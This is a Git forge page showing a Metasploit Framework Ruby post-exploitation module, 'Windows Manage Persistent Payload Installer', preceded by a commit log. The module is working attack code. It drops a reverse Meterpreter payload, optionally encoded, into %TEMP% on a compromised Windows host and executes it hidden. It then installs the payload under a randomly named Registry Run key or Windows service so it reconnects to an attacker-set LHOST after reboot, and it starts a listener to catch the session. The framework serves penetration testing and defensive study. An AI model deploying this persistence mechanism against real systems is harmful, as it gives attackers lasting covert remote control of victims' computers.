adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2dfd501e5f6263779e69378cf67c2db33db5ae05
metasploit-gs/modules/post/windows/manage/persistence.rb
T
James Lee 624e19fd8b Merge session-host-rework branch back to master 
Squashed commit of the following:

commit 2f4e8df33c5b4baa8d6fd67b400778a3f93482aa
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:31:03 2012 -0700

    Clean up some rdoc comments

    This adds categories for the various interfaces that meterpreter and
    shell sessions implement so they are grouped logically in the docs.

commit 9d31bc1b35845f7279148412f49bda56a39c9d9d
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 13:00:25 2012 -0700

    Combine the docs into one output dir

    There's really no need to separate the API sections into their own
    directory.  Combining them makes it much easier to read.

commit eadd7fc136a9e7e4d9652d55dfb86e6f318332e0
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:27:22 2012 -0700

    Keep the order of iface attributes the same accross rubies

    1.8 doesn't maintain insertion order for Hash keys like 1.9 does so we
    end up with ~random order for the display with the previous technique.
    Switch to an Array instead of a Hash so it's always the same.

commit 6f66dd40f39959711f9bacbda99717253a375d21
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:23:35 2012 -0700

    Fix a few more compiler warnings

commit f39cb536a80c5000a5b9ca1fec5902300ae4b440
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 08:17:39 2012 -0700

    Fix a type-safety warning

commit 1e52785f38146515409da3724f858b9603d19454
Author: James Lee <egypt@metasploit.com>
Date:   Mon Feb 27 15:21:36 2012 -0700

    LHOST should be OptAddress, not OptAddressRange

commit acef978aa4233c7bd0b00ef63646eb4da5457f67
Author: James Lee <egypt@metasploit.com>
Date:   Sun Feb 26 17:45:59 2012 -0700

    Fix a couple of warnings and a typo

commit 29d87f88790aa1b3e5db6df650ecfb3fb93c675b
Author: HD Moore <hdm@digitaloffense.net>
Date:   Mon Feb 27 11:54:29 2012 -0600

    Fix ctype vs content_type typo

commit 83b5400356c47dd1973e6be3aa343084dfd09c73
Author: Gregory Man <man.gregory@gmail.com>
Date:   Sun Feb 26 15:38:33 2012 +0200

    Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x

commit 49c2c80b347820d02348d694cc71f1b3028b4365
Author: Steve Tornio <swtornio@gmail.com>
Date:   Sun Feb 26 07:13:13 2012 -0600

    add osvdb ref

commit e18e1fe97b89c3a2b8c22bc6c18726853d2c2bee
Author: Matt Andreko <mandreko@gmail.com>
Date:   Sat Feb 25 18:02:56 2012 -0500

    Added aspx target to msfvenom.  This in turn added it to msfencode as well.
    Ref: https://github.com/rapid7/metasploit-framework/pull/188
    Tested on winxp with IIS in .net 1.1 and 2.0 modes

commit e6aa5072112d79bbf8a4d2289cf8d301db3932f5
Author: Joshua J. Drake <github.jdrake@qoop.org>
Date:   Sat Feb 25 13:00:48 2012 -0600

    Fixes #6308: Fall back to 127.0.0.1 when SocketError is raised from the resolver

commit b3371e8bfe
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 17:07:42 2012 -0700

    Simplify logic for whether an inner iface has the same address

commit 5417419f35
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:58:16 2012 -0700

    Whitespace

commit 9036875c29
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:53:45 2012 -0700

    Set session info before worrying about address

    get_interfaces can take a while on Linux, grab uid and hostname earlier
    so we can give the user an idea of what they popped as soon as possible.

commit f34b51c629
Author: James Lee <egypt@metasploit.com>
Date:   Tue Feb 28 16:48:42 2012 -0700

    Clean up rdoc

commit e61a066345
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:54:45 2012 -0600

    Ensure the architecture is only the first word (not the full WOW64
    message in some cases)

commit 4c70161097
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:49:17 2012 -0600

    More paranoia code, just in case RHOST is set to whitespace

commit c5ff89fe3d
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 04:47:01 2012 -0600

    A few more small bug fixes to handle cases with an empty string target
    host resulting in a bad address

commit 462d0188a1
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Feb 28 03:55:10 2012 -0600

    Fix up the logic (reversed by accident)

commit 2b2b0adaec
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 23:29:52 2012 -0600

    Automatically parse system information and populate the db, identify and
    report NAT when detected, show the real session_host in the sessions -l
    listing

commit 547a4ab4c6
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:16:03 2012 -0600

    Fix typo introduced

commit 27a7b7961e
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:11:38 2012 -0600

    More session.session_host tweaks

commit e447302a1a
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:08:20 2012 -0600

    Additional tunnel_peer changes

commit 93369fcffa
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:06:21 2012 -0600

    Additional changes to session.session_host

commit c3552f66d1
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Feb 27 22:00:19 2012 -0600

    Merge changes into the new branch
2012-02-28 18:29:39 -07:00

382 lines
13 KiB
Ruby
Raw Blame History

##
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/services'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Registry
include Msf::Post::Windows::WindowsServices
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup
method.
REXE mode will transfer a binary of your choosing to remote host to be
used as a payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Merlyn drforbin Cousins <drforbin6[at]gmail.com>'
],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'Actions' => [['TEMPLATE'], ['REXE']],
'DefaultAction' => 'TEMPLATE',
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptAddress.new('LHOST', [true, 'IP for persistent payload to connect to.']),
OptInt.new('LPORT', [true, 'Port for persistent payload to connect to.']),
OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM','SERVICE']]),
OptBool.new('HANDLER', [ false, 'Start a Multi/Handler to Receive the session.', true]),
OptString.new('TEMPLATE', [false, 'Alternate template Windows PE File to use.']),
OptString.new('REXE',[false, 'The remote executable to use.','']),
OptString.new('REXENAME',[false, 'The name to call exe on remote system','']),
OptString.new('ACTION',[true, 'Use TEMPLATE or REXE mode.','TEMPLATE']),
OptEnum.new('PAYLOAD_TYPE', [true, 'Meterpreter Payload Type.', 'TCP',['TCP','HTTP','HTTPS']])
], self.class)
register_advanced_options(
[
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",""]),
OptString.new('ENCODER', [false, "Encoder name to use for encoding.",]),
OptInt.new('ITERATIONS', [false, 'Number of iterations for encoding.']),
], self.class)
end
# Run Method for when run command is issued
#-------------------------------------------------------------------------------
def run
print_status("Running module against #{sysinfo['Computer']}")
# Set vars
rexe = datastore['REXE']
rexename = datastore['REXENAME']
lhost = datastore['LHOST']
lport = datastore['LPORT']
opts = datastore['OPTIONS']
delay = datastore['DELAY']
encoder = datastore['ENCODER']
iterations = datastore['ITERATIONS']
@clean_up_rc = ""
host,port = session.session_host, session.session_port
payload = "windows/meterpreter/reverse_tcp"
if datastore['ACTION'] == 'TEMPLATE'
# Check that if a template is provided that it actually exists
if datastore['TEMPLATE']
if not ::File.exists?(datastore['TEMPLATE'])
print_error "Template PE File does not exists!"
return
else
template_pe = datastore['TEMPLATE']
end
end
# Set the proper payload
case datastore['STARTUP']
when /TCP/i
payload = "windows/meterpreter/reverse_tcp"
when /HTTP/i
payload = "windows/meterpreter/reverse_http"
when /HTTPS/i
payload = "windows/meterpreter/reverse_https"
end
# Create payload and script
pay = create_payload(payload, lhost, lport, opts = "")
raw = pay_gen(pay,encoder, iterations)
script = create_script(delay, template_pe, raw)
script_on_target = write_script_to_target(script)
else
if datastore['REXE'].nil? or datastore['REXE'].empty?
print_error("Please define REXE")
return
end
if datastore['REXENAME'].nil? or datastore['REXENAME'].empty?
print_error("Please define REXENAME")
return
end
if not ::File.exist?(datastore['REXE'])
print_error("Rexe file does not exist!")
return
end
raw = create_payload_from_file(rexe)
script_on_target = write_exe_to_target(raw,rexename)
end
# Start handler if set
create_multihand(payload, lhost, lport) if datastore['HANDLER']
# Initial execution of script
target_exec(script_on_target)
case datastore['STARTUP']
when /USER/i
write_to_reg("HKCU",script_on_target)
when /SYSTEM/i
write_to_reg("HKLM",script_on_target)
when /SERVICE/i
install_as_service(script_on_target)
end
clean_rc = log_file()
file_local_write(clean_rc,@clean_up_rc)
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
report_note(:host => host,
:type => "host.persistance.cleanup",
:data => {
:local_id => session.sid,
:stype => session.type,
:desc => session.info,
:platform => session.platform,
:via_payload => session.via_payload,
:via_exploit => session.via_exploit,
:created_at => Time.now.utc,
:commands => @clean_up_rc
}
)
end
# Generate raw payload
#-------------------------------------------------------------------------------
def pay_gen(pay,encoder, iterations)
raw = pay.generate
if encoder
if enc_compat(pay, encoder)
print_status("Encoding with #{encoder}")
enc = framework.encoders.create(encoder)
(1..iterations).each do |i|
print_status("\tRunning iteration #{i}")
raw = enc.encode(raw, nil, nil, "Windows")
end
end
end
return raw
end
# Check if encoder specified is in the compatible ones
#
# Note: This should allow to adapt to new encoders if they appear with out having
# to have a static whitelist.
#-------------------------------------------------------------------------------
def enc_compat(payload, encoder)
compat = false
payload.compatible_encoders.each do |e|
if e[0] == encoder.strip
compat = true
end
end
return compat
end
# Create a payload given a name, lhost and lport, additional options
#-------------------------------------------------------------------------------
def create_payload(name, lhost, lport, opts = "")
pay = session.framework.payloads.create(name)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
if not opts.empty?
opts.split(",").each do |o|
opt,val = o.split("=", 2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
# Function for Creating persistent script
#-------------------------------------------------------------------------------
def create_script(delay,altexe,raw)
if not altexe.nil?
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, raw, {:persist => true, :delay => delay})
end
print_status("Persistent agent script is #{vbs.length} bytes long")
return vbs
end
# Function for creating log folder and returning log path
#-------------------------------------------------------------------------------
def log_file(log_path = nil)
#Get hostname
host = session.sys.config.sysinfo["Computer"]
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
if log_path
logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
else
logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
end
# Create the log directory
::FileUtils.mkdir_p(logs)
#logfile name
logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
return logfile
end
# Function for writing script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
# Method for checking if a listener for a given IP and port is present
# will return true if a conflict exists and false if none is found
#-------------------------------------------------------------------------------
def check_for_listner(lhost,lport)
conflict = false
client.framework.jobs.each do |k,j|
if j.name =~ / multi\/handler/
current_id = j.jid
current_lhost = j.ctx[0].datastore["LHOST"]
current_lport = j.ctx[0].datastore["LPORT"]
if lhost == current_lhost and lport == current_lport.to_i
print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
conflict = true
end
end
end
return conflict
end
# Starts a multi/handler session
#-------------------------------------------------------------------------------
def create_multihand(payload,lhost,lport)
pay = session.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
print_status("Starting exploit multi handler")
if not check_for_listner(lhost,lport)
# Set options for module
mul = session.framework.exploits.create("multi/handler")
mul.share_datastore(pay.datastore)
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'thread'
mul.datastore['ExitOnSession'] = false
# Validate module options
mul.options.validate(mul.datastore)
# Execute showing output
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'RunAsJob' => true
)
else
print_error("Could not start handler!")
print_error("A job is listening on the same Port")
end
end
# Function to execute script on target and return the PID of the process
#-------------------------------------------------------------------------------
def target_exec(script_on_target)
print_status("Executing script #{script_on_target}")
proc = datastore['ACTION'] == 'REXE' ? session.sys.process.execute(script_on_target, nil, {'Hidden' => true})\
: session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
print_good("Agent executed with PID #{proc.pid}")
@clean_up_rc << "kill #{proc.pid}\n"
return proc.pid
end
# Function to install payload in to the registry HKLM or HKCU
#-------------------------------------------------------------------------------
def write_to_reg(key,script_on_target)
nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
if(key)
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
else
print_error("Error: failed to open the registry key for writing")
end
end
# Function to install payload as a service
#-------------------------------------------------------------------------------
def install_as_service(script_on_target)
if is_system? or is_admin?
print_status("Installing as service..")
nam = Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating service #{nam}")
datastore['ACTION'] == 'REXE' ? service_create(nam, nam, "cmd /c \"#{script_on_target}\"") : service_create(nam, nam, "cscript \"#{script_on_target}\"")
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
else
print_error("Insufficient privileges to create service")
end
end
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
return tempvbs
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
return ::IO.read(exec)
end
end
Reference in New Issue View Git Blame Copy Permalink